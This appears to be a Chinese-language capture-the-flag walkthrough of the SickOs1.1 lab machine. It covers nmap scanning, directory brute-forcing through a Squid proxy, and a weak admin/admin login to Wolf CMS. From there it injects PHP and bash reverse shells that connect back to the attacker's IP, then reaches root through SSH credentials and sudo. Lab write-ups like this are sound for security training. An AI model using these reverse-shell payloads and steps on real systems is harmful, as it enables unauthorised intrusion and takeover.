SickOs1.1

arp-scan -l 找到ip 192.168.111.131

先简单做一下信息收集

1
2
3
nmap -p- 192.168.111.131  //扫不出来任何东西,百思不得其解,

nmap --min-rate 100000 -p- 192.168.111.131 //强制每秒发包100000

image-20241115002321579

发现开了3个端口,3128见许多次了,是做代理转发的,

nmap --min-rate 100000 -sU -p22,3128,8080 192.168.111.131

image-20241115002757337

继续通过dirb\dirsearch进行信息收集,,,,发现扫不通,8080端口扫不到任何东西,加上-p参数之后可以了,

dirb http://192.168.111.131/ -p http://192.168.111.131:3128/ dirsearch -u 192.168.111.131 --proxy=http://192.168.111.131:3128

扫到robots.txt,提示/wolfcms目录,是一个cms,在后台点点点之后发现可能有注入点,通过Google搜索找到了cms的后台登录,并且尝试弱口令登上了

image-20241115003807181

admin/admin

image-20241115003929381

找了半天,最后发现在

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.111.128/1234 0>&1'"); ?>

最关键的一步,右侧View才能运行代码

image-20241115011911285

1
2
3
4
5
6
7
8
9
10
11
<?php
$sock=fsockopen('192.168.111.128',1111);
$descriptorspec=array(
0=>$sock,
1=>$sock,
2=>$sock
);
$process=proc_open('/bin/sh',$descriptorspec,$pipes);
proc_close($process);
echo phpinfo();
?> //上传这个shell也行 访问位置 http://192.168.111.131/wolfcms/public/shell.php

python -c 'import pty; pty.spawn("/bin/bash")' 获得交互式shell

image-20240918180441902

这里找到了mysql账号,找了一圈也没有什么信息。现在开启上帝视角,我们是可以查看/etc/passwd的,

img

然后可以通过ssh sickos@192.168.111.131 密码是john@123。然后sudo -l发现有3个ALL权限,sudo /bin/bash获得root的shell

image-20241115013145164